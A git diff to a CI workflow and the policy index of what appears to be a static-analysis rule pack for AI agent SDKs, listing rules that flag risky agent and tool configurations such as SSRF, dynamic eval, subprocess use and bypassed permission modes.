diff --git a/.github/workflows/rulebook.yml b/.github/workflows/rulebook.yml index 699b56b..a7c8ea2 100644 --- a/.github/workflows/rulebook.yml +++ b/.github/workflows/rulebook.yml @@ -25,10 +25,30 @@ jobs: - name: Checkout rulebook uses: actions/checkout@v4 + # A coordinated rules change ships as paired PRs (one here, one in + # trustabl-rules). Validate this PR's docs against the matching production + # PR before either merges: check out trustabl-rules at a branch of the SAME + # name as this PR's head branch when it exists; otherwise fall back to main + # (push to main has an empty head_ref, so main always validates against the + # real production pack). + - name: Resolve trustabl-rules ref + id: rulesref + env: + RULES_TOKEN: ${{ secrets.RULES_REPO_TOKEN || github.token }} + run: | + ref="${{ github.head_ref }}" + if [ -n "$ref" ] && git ls-remote --exit-code --heads \ + "https://x-access-token:${RULES_TOKEN}@github.com/trustabl/trustabl-rules.git" "$ref" >/dev/null 2>&1; then + echo "ref=$ref" >> "$GITHUB_OUTPUT" + else + echo "ref=main" >> "$GITHUB_OUTPUT" + fi + - name: Checkout trustabl-rules uses: actions/checkout@v4 with: repository: trustabl/trustabl-rules + ref: ${{ steps.rulesref.outputs.ref }} path: .rules token: ${{ secrets.RULES_REPO_TOKEN || github.token }} @@ -59,10 +79,30 @@ jobs: - name: Checkout rulebook uses: actions/checkout@v4 + # A coordinated rules change ships as paired PRs (one here, one in + # trustabl-rules). Validate this PR's docs against the matching production + # PR before either merges: check out trustabl-rules at a branch of the SAME + # name as this PR's head branch when it exists; otherwise fall back to main + # (push to main has an empty head_ref, so main always validates against the + # real production pack). + - name: Resolve trustabl-rules ref + id: rulesref + env: + RULES_TOKEN: ${{ secrets.RULES_REPO_TOKEN || github.token }} + run: | + ref="${{ github.head_ref }}" + if [ -n "$ref" ] && git ls-remote --exit-code --heads \ + "https://x-access-token:${RULES_TOKEN}@github.com/trustabl/trustabl-rules.git" "$ref" >/dev/null 2>&1; then + echo "ref=$ref" >> "$GITHUB_OUTPUT" + else + echo "ref=main" >> "$GITHUB_OUTPUT" + fi + - name: Checkout trustabl-rules uses: actions/checkout@v4 with: repository: trustabl/trustabl-rules + ref: ${{ steps.rulesref.outputs.ref }} path: .rules token: ${{ secrets.RULES_REPO_TOKEN || github.token }} diff --git a/POLICY_INDEX.md b/POLICY_INDEX.md index 35304fe..6c410b1 100644 --- a/POLICY_INDEX.md +++ b/POLICY_INDEX.md @@ -3,8 +3,9 @@ All shipped rules across every SDK. ID prefix denotes the rule family: `CSDK-` Claude Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK, -`MCP-` Model Context Protocol. Within a family: `NNN` tool-scope, `1NN` -agent / subagent scope, `2NN` repo scope. +`MCP-` Model Context Protocol, `LC-` LangChain / LangGraph, `CREW-` CrewAI, +`AG2-` AutoGen / AG2, `VAI-` Vercel AI SDK, `PYD-` Pydantic AI. Within a +family: `NNN` tool-scope, `1NN` agent / subagent scope, `2NN` repo scope. Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. @@ -37,133 +38,184 @@ Users can contribute their own policies by: ## Totals -| SDK | Tool | Agent | Subagent | Repo | Total | Per-SDK index | -| ---------------------- | ------ | ------ | -------- | ----- | ------- | -------------------------------------------------------- | -| Claude Agent SDK | 17 | 8 | 2 | 3 | 30 | [claude_sdk/POLICY_INDEX.md](claude_sdk/POLICY_INDEX.md) | -| OpenAI Agents SDK | 21 | 9 | 0 | 2 | 32 | [openai_sdk/POLICY_INDEX.md](openai_sdk/POLICY_INDEX.md) | -| Google ADK | 14 | 11 | 0 | 1 | 26 | [google_adk/POLICY_INDEX.md](google_adk/POLICY_INDEX.md) | -| Model Context Protocol | 14 | 0 | 0 | 0 | 14 | [mcp/POLICY_INDEX.md](mcp/POLICY_INDEX.md) | -| LangChain / LangGraph | 11 | 3 | 0 | 1 | 15 | [langchain/POLICY_INDEX.md](langchain/POLICY_INDEX.md) | -| **All** | **77** | **31** | **2** | **7** | **117** | | +| SDK | Tool | Agent | Subagent | Repo | Total | Per-SDK index | +| ---------------------- | ------- | ------ | -------- | ------ | ------- | ---------------------------------------------------------- | +| Claude Agent SDK | 17 | 8 | 2 | 3 | 30 | [claude_sdk/POLICY_INDEX.md](claude_sdk/POLICY_INDEX.md) | +| OpenAI Agents SDK | 21 | 9 | 0 | 2 | 32 | [openai_sdk/POLICY_INDEX.md](openai_sdk/POLICY_INDEX.md) | +| Google ADK | 14 | 11 | 0 | 1 | 26 | [google_adk/POLICY_INDEX.md](google_adk/POLICY_INDEX.md) | +| Model Context Protocol | 14 | 0 | 0 | 0 | 14 | [mcp/POLICY_INDEX.md](mcp/POLICY_INDEX.md) | +| LangChain / LangGraph | 11 | 3 | 0 | 1 | 15 | [langchain/POLICY_INDEX.md](langchain/POLICY_INDEX.md) | +| CrewAI | 7 | 6 | 0 | 1 | 14 | [crewai/POLICY_INDEX.md](crewai/POLICY_INDEX.md) | +| AutoGen / AG2 | 6 | 5 | 0 | 1 | 12 | [autogen/POLICY_INDEX.md](autogen/POLICY_INDEX.md) | +| Vercel AI SDK | 5 | 3 | 0 | 1 | 9 | [vercel_ai/POLICY_INDEX.md](vercel_ai/POLICY_INDEX.md) | +| Pydantic AI | 7 | 4 | 0 | 1 | 12 | [pydantic_ai/POLICY_INDEX.md](pydantic_ai/POLICY_INDEX.md) | +| **All** | **102** | **49** | **2** | **11** | **164** | | ## All rules -| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | -| --- | -------- | ---------- | -------- | ----------------------------------------- | ------------------------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------------------- | -| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool | Tool has no description | low | 0.95 | 14.3 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool | Network call has no timeout | high | 0.85 | 59.5 | [claude_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | -| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | -| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [claude_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | -| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | -| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool | Ambiguous tool name | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | -| 10 | CSDK-010 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool shells out to the OS | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | -| 11 | CSDK-011 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool evaluates dynamic code | high | 0.90 | 63.0 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | -| 12 | CSDK-012 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool writes to the filesystem | medium | 0.50 | 20.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | -| 13 | CSDK-013 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | -| 14 | CSDK-014 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool has no description | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 15 | CSDK-016 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK mutating tool has no idempotency key | medium | 0.50 | 20.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | -| 16 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 17 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 18 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 19 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 20 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 21 | CSDK-107 | Claude SDK | tool | claude_sdk_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | -| 22 | CSDK-108 | Claude SDK | tool | claude_sdk_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | -| 23 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 24 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 25 | CSDK-120 | Claude SDK | agent | claude_agent_definition | TypeScript AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 26 | CSDK-130 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 27 | CSDK-131 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted filesystem-write or web-fetch built-ins | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 28 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 29 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 30 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without an agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [claude_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | -| 31 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 32 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 33 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 34 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 35 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 36 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [openai_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | -| 37 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 38 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [openai_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | -| 39 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 40 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [openai_sdk/observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | -| 41 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 42 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [openai_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | -| 43 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 44 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 45 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 46 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 47 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 48 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 49 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 50 | OAI-022 | OpenAI SDK | tool | openai_tool | TypeScript tool has no description | low | 0.85 | 12.8 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 51 | OAI-024 | OpenAI SDK | tool | openai_tool | TypeScript tool builds outbound URL from a non-literal value | medium | 0.60 | 24.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 52 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 53 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 54 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 55 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 56 | OAI-105 | OpenAI SDK | agent | openai_agent | TypeScript agent wires a content-fetching hosted tool without inputGuardrails | high | 0.80 | 56.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 57 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [openai_sdk/mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | -| 58 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 59 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 60 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 61 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [openai_sdk/tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | -| 62 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [openai_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | -| 63 | ADK-001 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no docstring | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 64 | ADK-002 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no type-annotated parameters | medium | 0.85 | 34.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 65 | ADK-003 | Google ADK | tool | adk_function_tool | Network call has no timeout | high | 0.85 | 59.5 | [google_adk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/network.yaml) | -| 66 | ADK-004 | Google ADK | tool | adk_function_tool | Path parameter used in I/O without normalization | high | 0.70 | 49.0 | [google_adk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/path_safety.yaml) | -| 67 | ADK-005 | Google ADK | tool | adk_function_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [google_adk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/error_handling.yaml) | -| 68 | ADK-006 | Google ADK | tool | adk_function_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [google_adk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/idempotency.yaml) | -| 69 | ADK-007 | Google ADK | tool | adk_function_tool | Ambiguous tool name | low | 0.90 | 13.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 70 | ADK-008 | Google ADK | agent | adk_llm_agent | Agent grants BashTool with no restrictive command policy | high | 0.75 | 52.5 | [google_adk/builtin_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/builtin_tools.yaml) | -| 71 | ADK-009 | Google ADK | tool | adk_function_tool | FunctionTool body prints to stdout | low | 0.70 | 10.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 72 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [google_adk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | -| 73 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | -| 74 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | -| 75 | ADK-013 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool has no description | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 76 | ADK-015 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool body evaluates dynamic code | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | -| 77 | ADK-016 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | -| 78 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 79 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 80 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 81 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 82 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 83 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 84 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 85 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 86 | ADK-109 | Google ADK | agent | adk_llm_agent | TypeScript LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 87 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 88 | ADK-201 | Google ADK | repo | google_adk | Google ADK project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [google_adk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | -| 89 | MCP-001 | MCP | tool | mcp_tool | Tool has no description | low | 0.90 | 13.5 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 90 | MCP-002 | MCP | tool | mcp_tool | Tool has no type-annotated parameters | medium | 0.85 | 34.0 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 91 | MCP-003 | MCP | tool | mcp_tool | Ambiguous tool name | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 92 | MCP-004 | MCP | tool | mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [mcp/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/network.yaml) | -| 93 | MCP-005 | MCP | tool | mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [mcp/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/path_safety.yaml) | -| 94 | MCP-006 | MCP | tool | mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [mcp/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/error_handling.yaml) | -| 95 | MCP-007 | MCP | tool | mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [mcp/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/idempotency.yaml) | -| 96 | MCP-008 | MCP | tool | mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | -| 97 | MCP-009 | MCP | tool | mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | -| 98 | MCP-010 | MCP | tool | mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | -| 99 | MCP-011 | MCP | tool | mcp_tool | TypeScript MCP tool has no description | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 100 | MCP-012 | MCP | tool | mcp_tool | TypeScript MCP tool spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | -| 101 | MCP-013 | MCP | tool | mcp_tool | TypeScript MCP tool fetches a 